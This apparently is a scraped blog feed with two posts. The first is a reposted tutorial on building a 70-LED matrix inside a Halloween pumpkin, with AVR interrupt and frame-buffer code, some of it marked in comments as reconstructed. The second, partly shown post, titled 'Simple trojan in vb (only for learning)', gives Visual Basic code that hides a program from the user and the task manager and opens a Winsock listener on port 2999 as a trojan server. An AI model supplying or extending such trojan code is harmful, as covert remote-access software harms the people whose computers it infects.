Installed in the autumn vegetable is a marquee made from a 5×14 matrix of light emitting diodes. I spaced them by printing out a grid on the computer, taping it to the pumpkin, and drilling 70 holes in the front of the thing. The real trouble came when inserting all of the LEDs from the inside; each of them has four wires soldered to it, creating a net of black wiring. Above you can see it turned out great. This is a shot of it scrolling the message HAPPY HALLOWEEN.&lt;br /&gt;
&lt;br /&gt;
Join us after the break for video of this prop. But we’re not just sharing the finished product. I’ll take you through the build process. Along the way you’ll learn the design considerations that go into an LED matrix and how you can use these techniques to build your own in any size and configuration you desire.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you want to see a larger version of the banner image &lt;a href="http://hackadaycom.files.wordpress.com/2010/10/70-led-in-a-pumpkin1.jpg"&gt;try this&lt;/a&gt;, and below is the video clip promised. Sorry for the poor quality, I’m working on borrowing a better video recorder (I’ll post an update if I manage to get one). There are a couple of animations that happen too fast for the camera. One is a side-to-side sweep that looks similar to a Cylon Eye or the front of Kitt, the car from Knight Rider. The other effect that is poorly represented in the video is a chase function that outlines the rectangle of the display. These both look great to the eye, and fortunately the scrolling text comes out pretty well in the video.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="display: block; text-align: center;"&gt;&lt;a href="http://hackaday.com/2010/10/26/70-led-matrix-in-a-jack-o-lantern/"&gt;&lt;img alt="" src="http://img.youtube.com/vi/ZxhLMC6zip4/2.jpg" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
I’m going to take you down the rabbit hole of LED Matrix design but before that let’s look at what it took to make this Jack-’o-lantern. If it turns out to be more than you can chew, we’ve got a beginners tutorial to help you &lt;a href="http://hackaday.com/2010/10/23/avr-programming-introduction/"&gt;get started with these microcontrollers&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;&lt;b&gt;Building the hardware&lt;/b&gt;&lt;/h2&gt;&lt;br /&gt;
Before we talk about how to design the circuit, let’s take a look at the build process.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-led-current-measurement.jpg?w=470&amp;amp;h=353" title="pumpkin-LED-current-measurement" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
I decided from the start to use different colored LEDs. For reasons that I’ll discuss in-depth in the design section of this tutorial I needed to drive the LEDs at about 10 mA each. I calculated my resistors and then measured each to make sure I was close to my target. This is just fine for blue.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="301" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-assembly-template.jpg?w=470&amp;amp;h=301" title="pumpkin-assembly-template" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
I wanted a way to hold the LEDs while I’m soldering, and I needed a template for drilling the pumpkin. Here I’m using that template made from my Eagle board layout to make an assembly jig using some hardboard. This turned out to be a rather poor choice of material because it started to come apart on the underside, but it worked.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="283" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-soldering-daisy-chains.jpg?w=470&amp;amp;h=283" title="pumpkin-soldering-daisy-chains" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
I need to solder all of the cathodes in the same row together. I cut small pieces of wire (13 for each row) plus a longer wire to connect to the driver board. Above I’m soldering those wires into daisy chains.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="246" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-completed-daisychain.jpg?w=470&amp;amp;h=246" title="pumpkin-completed-daisychain" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here’s a daisy chain for one row… four more to go.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-checking-led-color.jpg?w=470&amp;amp;h=353" title="pumpkin-checking-LED-color" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
I’m using clear LEDs which means you can’t tell what color they are when there’s no electricity running to them. Before moving a row to the assembly jig I tested them on the breadboard.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-shrinktube-first.jpg?w=470&amp;amp;h=353" title="pumpkin-shrinktube-first" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
As I moved each LED from the breadboard to the jig I clipped off the excess cathode lead. From there remember the mantra: ‘Shrinktube FIRST!!!’ or you’ll be sorry. You can see it just above the solder joint in this image.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-soldering-rows.jpg?w=470&amp;amp;h=353" title="pumpkin-soldering-rows" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Just keep going down the row until complete. In the image above I’ve already heated the shrink tube with a candle-lighter. Note: The two images above are different rows. For one I started on the left and for the other I started on the right. I hope it’s not too confusing.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="295" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-completed-row.jpg?w=470&amp;amp;h=295" title="pumpkin-completed-row" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here’s one row of completed soldering. After each I removed it and set it aside.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-rows-complete.jpg?w=470&amp;amp;h=353" title="pumpkin-rows-complete" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
All of the rows have been completed and I’ve reinstalled them in the jig in preparation for soldering the anodes into columns.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-wire-for-columns.jpg?w=470&amp;amp;h=353" title="pumpkin-wire-for-columns" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here’s the wires cut to make daisy chains for the columns. I used black wire for the short sections because I’ve got a huge supply of it compared to the red, which I’ve cut for the control lines.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="343" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-column-daisychains.jpg?w=470&amp;amp;h=343" title="pumpkin-column-daisychains" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
The completed column daisy chains.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-soldering-columns.jpg"&gt;&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-soldering-columns.jpg?w=470&amp;amp;h=353" title="pumpkin-soldering-columns" width="470" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Here I’m soldering the fourth column. After I’ve finished one I just lifted up the five LEDs and held them aside with this third hand. Go slowly and be patient… you can do this!&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-all-leds-soldered.jpg?w=470&amp;amp;h=353" title="pumpkin-all-LEDs-soldered" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Done! Well, the LEDs are all soldered. It’s time to make a control board for the rows.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-transistor-board.jpg?w=470&amp;amp;h=353" title="pumpkin-transistor-board" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here’s the control board for my rows. I hot glued the incoming lines from the rows to the board for strain relief. Each is connected to the collector of a 2N3904 transistor. The camera flash makes it hard to see but there is a 3k3 resistor connected to the base of each transistor. I’ll add single-conductor wire to those later so they can be plugged into the breadboard. On the left you can see a wire for the GND rail, which connects to the ground of the power supply.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-column-headers.jpg"&gt;&lt;img alt="" height="400" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-column-headers.jpg?w=470&amp;amp;h=400" title="pumpkin-column-headers" width="470" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Each column contains the same color LED. I found that the red LEDs needed a different resistor from the rest. Here I’ve soldered resistors to the control wires for each column and soldered groups onto pin heads for each interface with the breadboard.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-completed-circuit.jpg?w=470&amp;amp;h=353" title="pumpkin-completed-circuit" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here’s the finished control board. At the center of the breadboard is an ATmega168 microcontroller. The black arches connect the transistor base to PortC of the chip via the 3k3 resistors. There are three groups of column pin headers that plug into PortB and PortD.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="362" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-completed-circuit-overview.jpg?w=470&amp;amp;h=362" title="pumpkin-completed-circuit-overview" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
This is an overview of the completed hardware. At this point I was sure hoping I’d be able to get this into the pumpkin.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-firmware-testing.jpg?w=470&amp;amp;h=353" title="pumpkin-firmware-testing" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here I’m working on the firmware for the matrix. This is where a better choice of material for the assembly jig would have been nice. But like I said before, it worked.&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;Getting it in the pumpkin&lt;/h2&gt;&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-the-donor.jpg?w=470&amp;amp;h=353" title="pumpkin-the-donor" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
I started with a fairly large donor pumpkin. I tried to pick one that had a fairly flat face without too much curve.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-with-drill-guide.jpg?w=470&amp;amp;h=353" title="pumpkin-with-drill-guide" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Before starting I made sure to locate where the matrix would be drilled by taping on another copy of the template I used for the assembly jig.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-access-hatch.jpg?w=470&amp;amp;h=353" title="pumpkin-access-hatch" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
I cut a large access hatch in the back and cleaned out the guts. The seams of this will not be seen from the front.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-cleaned-out.jpg?w=470&amp;amp;h=353" title="pumpkin-cleaned-out" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here it is, nice and clean. I want to keep as much wet gunk away from the electronics as possible.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-mid-drilling.jpg?w=470&amp;amp;h=353" title="pumpkin-mid-drilling" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Time to drill. I used a bamboo shish-kebab skewer to poke a pilot hole through the skin of the pumpkin so the drill-bit wouldn’t wander. I found a 13/64th drill bit worked perfectly.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-holes-finished.jpg?w=470&amp;amp;h=353" title="pumpkin-holes-finished" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here’s the completed grid.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-grid-from-inside.jpg?w=470&amp;amp;h=353" title="pumpkin-grid-from-inside" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Here’s where the LEDs need to go. I spent a bit of time making sure the holes were cleaned out using the skewers.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-electronics-installed.jpg?w=470&amp;amp;h=353" title="pumpkin-electronics-installed" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
Take a deep breath and start inserting LEDs. Once I had them all in place I powered up the unit and checked to make sure I hadn’t switched around any of them. Once I knew it was right I used a skewer to push each LED through to the surface.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-circuit-boards.jpg?w=470&amp;amp;h=353" title="pumpkin-circuit-boards" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
This little plastic dish keeps the control circuitry dry on the bottom. I’ve added a little 5V regulator I built for a different project, with a 9V battery hidden beneath the larger board.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="353" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-closed-for-business.jpg?w=470&amp;amp;h=353" title="pumpkin-closed-for-business" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
The power is on and I’ve sealed the hatch using a few skewers.&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="" height="317" src="http://hackadaycom.files.wordpress.com/2010/10/pumpkin-lights-on-boo.jpg?w=470&amp;amp;h=317" title="pumpkin-lights-on-boo" width="470" /&gt;&lt;br /&gt;
&lt;br /&gt;
This is how it looks with the lights on. Here it’s displaying the word BOO.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hackadaycom.files.wordpress.com/2010/10/70-led-in-a-pumpkin1.jpg"&gt;&lt;img alt="" height="337" src="http://hackadaycom.files.wordpress.com/2010/10/70-led-in-a-pumpkin1.jpg?w=450&amp;amp;h=337" title="70-LED-in-a-pumpkin" width="450" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
The finished product. Whew, what a relief!&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: 20px; font-weight: bold;"&gt;How to design an LED matrix&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
Ok, let’s jump into the why’s and how’s of building an LED matrix.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Multiplexing&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The display I built has 70 LEDs. If you individually address each LED you’re going to need 70 pins on your microcontroller. But there’s an easier way. &lt;a href="http://en.wikipedia.org/wiki/Multiplexed_display"&gt;Multiplexing&lt;/a&gt; is a method of lighting just a portion of the display at one time. Using a microprocessor you can switch which section is on so quickly that your eye doesn’t ever perceive it being off.&lt;br /&gt;
&lt;br /&gt;
Because one section will be turned off while scanning through the other parts of the display you want to keep the number of multiplexed sections low. I chose to multiplex the five rows of this matrix. That means that one row will be on 1/5th of the time, which we call a 1/5th duty cycle. This is basically a type of pulse-width modulation, a technique we use to dim LEDs. I’ve used ultra-bright LEDs for this very reason.&lt;br /&gt;
&lt;br /&gt;
Here’s how the multiplex of this display is going to work: Turn off all rows and columns. Set the columns you want to be illuminated in the first row. Turn on the first row driver and the columns in that row will light up. Start over and move to the second row. Here’s the schematic for the matrix I built (click to enlarge):&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://hackadaycom.files.wordpress.com/2010/10/pumkin-matrix.png"&gt;&lt;img alt="" height="286" src="http://hackadaycom.files.wordpress.com/2010/10/pumkin-matrix.png?w=450&amp;amp;h=286" title="pumkin-matrix" width="450" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Columns and Addressing&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
We want each LED to have the same brightness. Because only one row will ever be on at one time, a single resistor in each column will work for all of the LEDs in that column. That is because an LED must be connected to both voltage and ground in order for current to flow. All of the anodes (positive leg of the LED) are connected together in the columns, and all of the cathodes (negative leg of the LED) are connected in rows. So turning on column 1 and row 1 will let current flow through the LED at that location. The LEDs in rows 0, 2, 3, and 4 will not light because their rows haven’t been turned on and so they have no connection to ground on their cathode. In this way we build a grid of LEDs that are addressable.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Size Limitations&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Multiplexing introduces an issue with current draw. I am limited in the number of columns I can drive because I’m connecting them to a microcontroller. If you look at the ATmega168 electrical characteristics in the datasheet you’ll find it can source 40mA per pin. But there is a limitation on what the supply pin of that chip (VCC) can source. The VCC pin is limited to 200mA. We must stay below that threshold or the chip may be damaged.&lt;br /&gt;
&lt;br /&gt;
This is part of the reason that I chose to use 14 columns. There will never be more than 14 LEDs on at once because that’s how many are in a single row. If I drive them at 10mA each, I’m pulling a total of 140mA. This is below the 200mA threshold and leaves some room for error, and for the current that the ATmega168 needs to run. I’ve also limited it to 14 because I wanted to reserve 2 particular pins on the device for other purposes, but more on that later.&lt;br /&gt;
&lt;br /&gt;
We need to consider the current on the low side of the LED matrix. The rows act as the ground connection for the display. If all the LEDs in a row are illuminated at once, there will be around 140mA coming down that control wire. It can’t be connected directly to a microcontroller because that’s too much current for one pin. Instead, I’ve used an NPN transistor. The 2N3904 conveniently has a 200mA limit which is enough to handle the 140 mA sinking from the display. These transistors work like a switch, requiring just 1/100th of the current you are switching to be present on the base leg of the device in order for it to connect the control wire to ground.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;How can we make bigger displays?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I wanted to keep the parts count for this display small, but there’s really no limit on size if you’re willing to add more components. Beefier transistors allow you to switch much higher currents. And you can use cascading shift registers to expand the number of columns. Those shift registers are addressed with one data line and a clock… pulsing data in serially instead of in parallel as we’re doing in our example. You take a speed hit because it takes two cycles for each column (one to set the data bit, one to clock it in, and repeat until all columns have been pulsed in). Explaining this in detail is beyond the scope of this tutorial but as long as you are keeping current consumption for your parts within the device specifications you &lt;i&gt;can &lt;/i&gt;go big.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Making the connection&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
As I said above, I wanted to keep my parts count to a minimum and so chose not to use shift registers. That means I need one pin for each column and one pin for each row. Using all eight pins on PortB and PortD of the microcontroller I could still hook up the five rows to PortC AND have at least one pin left over (two pins if you want to use RST as I/O). Why didn’t I make this 16 columns long?&lt;br /&gt;
&lt;br /&gt;
There’s a good reason. I wanted to leave the serial port on the chip available for future use. RXD and TXD are located on pins 0 and 1 of PortD. I could have moved the last two columns to a different port but that would mean addressing 3 ports for the columns instead of two; causing a slowdown in the performance of the processor.&lt;br /&gt;
&lt;br /&gt;
&lt;h2&gt;Writing the code&lt;/h2&gt;&lt;br /&gt;
Writing code for a multiplex display comes in two parts; some type of frame buffer, and code to handle the multiplexing in the background. &lt;b&gt;Please &lt;a href="http://www.mediafire.com/?uu2h9tfbebyvh8p"&gt;download the source package&lt;/a&gt; and follow along. &lt;/b&gt;There are pin, port, and data direction register defines at the top that will clarify what some of the code examples in this post are doing.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Frame buffering&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is a simple concept. You need a data structure that represents the physical display. We’re operating with pixels that are either on or off, which is the definition of binary code. So we just need to think of our currently displayed frame as five integers. An integer is a 16-bit number when working with AVR; one bit for each LED (two bits will go to waste) and five integers for the five rows:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;volatile int buffer[5] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000 };&lt;/pre&gt;&lt;br /&gt;
I’ve used hexadecimal instead of binary to initialize this array. That’s a pretty common practice because it takes 1/4 of the characters to represent the same amount of data. Be assured, 0x0000 and 0b0000000000000000 are the same value.&lt;br /&gt;
&lt;br /&gt;
Also notice that I’ve used the keyword ‘volatile’. This is extremely important, because this data will be accessed by both an interrupt service routine and the main body of the code. If it is not volatile the compiler may optimize away accesses to this data, resulting in bizarre and hard to debug behavior. Also, we’re using 16-bit data types on an 8-bit device. It will be important to disable interrupts when changing the data so that we don’t have an interrupt happen between changing the first and second bytes of an integer. More on this later.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Interrupt-driven multiplexing&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is really one of the easiest parts of this process. It can just be a little hard to wrap your mind around what’s happening at first.&lt;br /&gt;
&lt;br /&gt;
We don’t want to ever think about what’s happening with the scanning of our five rows. Using a timer-based interrupt we can multiplex the display at a constant rate and forget about it.&lt;br /&gt;
&lt;br /&gt;
Here’s how it works. We set up a timer to trigger an interrupt many times per second. When that interrupt occurs, the processor will stop running the main loop of our code (no matter what’s going on) and run the code in our Interrupt Service Routine (ISR). Here’s how I set up Timer1 to interrupt 500 times per second:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;#include &amp;lt;avr/io.h&amp;gt;
#include &amp;lt;avr/interrupt.h&amp;gt;

//Initialize the Timers
static inline void initTimers(void) //Function used once to set up the timer
{
TCCR1B |= (1&amp;lt;&amp;lt;WGM12) | (1&amp;lt;&amp;lt;CS10); //CTC mode, no prescaler: count every system clock cycle and restart on compare match (bit names assumed; this line was truncated in the original)
TIMSK1 |= (1&amp;lt;&amp;lt;OCIE1A);   //Enable the Timer1 compare match A interrupt (bit name assumed, as above)
OCR1A = 0x07D0;   //Set compare value for 500 times per second
sei();    //Enable global interrupts
}&lt;/pre&gt;&lt;br /&gt;
Let’s consider the math for just a bit. The ATmega168 has an internal clock that is set to run at 1 MHz. I’d like to have my display updated 500 times per second, resulting in a complete refresh of all five rows 100 times per second. So 1,000,000 cycles per second divided by 500 interrupts equals a target of 2000 cycles. I need to set up a timer that will count each of the system clock cycles and trigger an interrupt when 2000 of them have passed. That is what the OCR1A value does: 0x07D0 is the hexadecimal equivalent of 2000.&lt;br /&gt;
&lt;br /&gt;
For those of you who really know what you’re doing, you’ve probably noticed an error. The timer starts counting at 0 instead of 1, which means I really should be interrupting at one cycle less than 0x07D0, but it’s close enough for jazz.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Interrupt handling&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now that we’ve written code to create an interrupt 500 times per second, we’ve got to do something when that happens. The plan is to keep track of the next row that should be turned on. At the beginning of the interrupt we’ll turn off the entire display, set the column pins for the next row to be displayed using the frame buffer, turn on that row, and set up for the next interrupt. Here’s the code to make that happen:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;ISR(TIMER1_COMPA_vect) //Interrupt Service Routine handles multiplexing
{
static unsigned char row_track = 0; //Next row to drive; keeps its value between interrupts (declaration assumed here, it lives in the source package)

//Shutdown all rows
rowPort &amp;amp;= ~rowMask;

//Shutdown all columns
colPort0 &amp;amp;= ~colMask0;
colPort1 &amp;amp;= ~colMask1;

//Set buffer data to columns
colPort0 = (char)buffer[row_track]; //Low byte drives columns 0-7
colPort1 |= ((char)(buffer[row_track] &amp;gt;&amp;gt; 6) &amp;amp; 0xFC); //Shift data and mask out lower bits (reserved for Rx and Tx)

//Drive row
rowPort |= (1&amp;lt;&amp;lt;(4-row_track));

//Preload row for next interrupt
if(++row_track == 5) row_track = 0;  //Row tracking
}&lt;/pre&gt;&lt;br /&gt;
There is a bit of magic code going on above. Here it is out of context so we can pick it apart:&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;colPort1 |= ((char)(buffer[row_track] &amp;gt;&amp;gt; 6) &amp;amp; 0xFC)&lt;/pre&gt;&lt;br /&gt;
I’ve defined ‘colPort1’ earlier in the source code as PORTD. That’s the one where we’ve reserved the lowest two bits for later use as a serial connection. When we write integer data to a port, only the lowest 8 bits are kept by the microcontroller, because that’s the size of the ports. To the right of the equals sign, the frame buffer value is first shifted to the right inside the parentheses and the result is then cast to an 8-bit char. We want the most significant byte of that integer data for columns 8-13, which is why we shift to the right. But I only shifted it six places, because we’re not going to use the lower two bits of the register. Finally, I used the bitwise ‘&amp;amp;’ operator to mask out the lower two bits so that we don’t mess up any other uses for those pins that may come in the future. I feel this line of code is a great example of the power of binary data, and if you don’t fully understand it you simply must take the time to study how it works. It’s a fantastic part of working with embedded systems.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Manipulating the frame buffer&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Our display is multiplexing in the background and we no longer have to worry about that. Now you can display just about anything you want by manipulating the frame buffer.&lt;br /&gt;
&lt;br /&gt;
In this case, the frame buffer is an array of five integer values. As I discussed earlier, an 8-bit device needs at least two separate byte writes to store a 16-bit integer. What happens if an interrupt fires between those two writes? The ISR would read a half-updated value. For this reason it’s important to disable interrupts while changing the frame buffer. But disabling interrupts also stops our automated multiplexing, so make sure you change the frame buffer quickly and re-enable interrupts as soon as you can.&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;void clearScreen(void)
{
cli();    //Disable interrupts so the ISR can't read a half-written integer
for (unsigned char i=0; i&amp;lt;5; i++) buffer[i] = 0x0000;  //All five rows off
sei();    //Re-enable interrupts; multiplexing resumes
}&lt;/pre&gt;&lt;br /&gt;
The above code is probably the simplest example we can use. This will immediately clear the display. The ‘cli();’ command will disable interrupts, and the ‘sei();’ command will enable them. In between I’ve used a ‘for’ loop to set all five integers in our buffer array to 0x0000, which represents off. If I had set every bit to 1 instead, all of the LEDs in the display would be illuminated.</description><link>http://feedproxy.google.com/~r/blogspot/UlQki/~3/q3l1_f_vsuE/70-led-matrix-in-jack-o-lantern.html</link><author>noreply@blogger.com (Eracnid Mitnick)</author><thr:total>0</thr:total><feedburner:origLink>http://hackmystuff.blogspot.com/2010/10/70-led-matrix-in-jack-o-lantern.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1548500639891694165.post-7552930307033416770</guid><pubDate>Wed, 27 Oct 2010 08:53:00 +0000</pubDate><atom:updated>2010-10-27T01:53:52.938-07:00</atom:updated><title>Simple trojan in vb ..... (only for learning)</title><description>&lt;div style="text-align: left;"&gt;Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications, both with fewer than 100 lines of code. The first application is the client, or the program that one user knows about. The second is the server, or the actual “trojan” part. I will now go through what you need for both and some sample code.&lt;br /&gt;
&lt;br /&gt;
Server&lt;br /&gt;
The server is the Trojan part of the program. You usually will want this  to be as hidden as possible so the average user can’t find it. To do  this you start by using&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 84px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;This little bit of code makes the program invisible to the naked  eye. Now we all know that the task manager is a little bit peskier. So  to get our application hidden from that a little better we make our code  look like this. &lt;br /&gt;
&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 100px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;App.&lt;span&gt;TaskVisible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
&lt;span style="color: blue;"&gt;End&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt;&lt;/div&gt;&lt;/pre&gt;&lt;/div&gt;So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now, so let’s make it a lot better by adding functions to our Trojan!&lt;br /&gt;
The first thing we want to do is make it able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win, but you can name yours whatever you like. &lt;br /&gt;
&lt;br /&gt;
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.&lt;br /&gt;
&lt;div style="margin: 5px 20px 20px; text-align: left;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code: VB&lt;/div&gt;&lt;pre class="alt2" style="border: 1px inset; height: 148px; margin: 0px; overflow: auto; padding: 6px; width: 640px;"&gt;&lt;div class="vb"&gt;&lt;span style="color: blue;"&gt;Private&lt;/span&gt; &lt;span style="color: blue;"&gt;Sub&lt;/span&gt; Form_Load&lt;span style="color: #66cc66;"&gt;(&lt;/span&gt;&lt;span style="color: #66cc66;"&gt;)&lt;/span&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;span style="color: blue;"&gt;Me&lt;/span&gt;.&lt;span&gt;Visible&lt;/span&gt; = &lt;span style="color: blue;"&gt;False&lt;/span&gt;
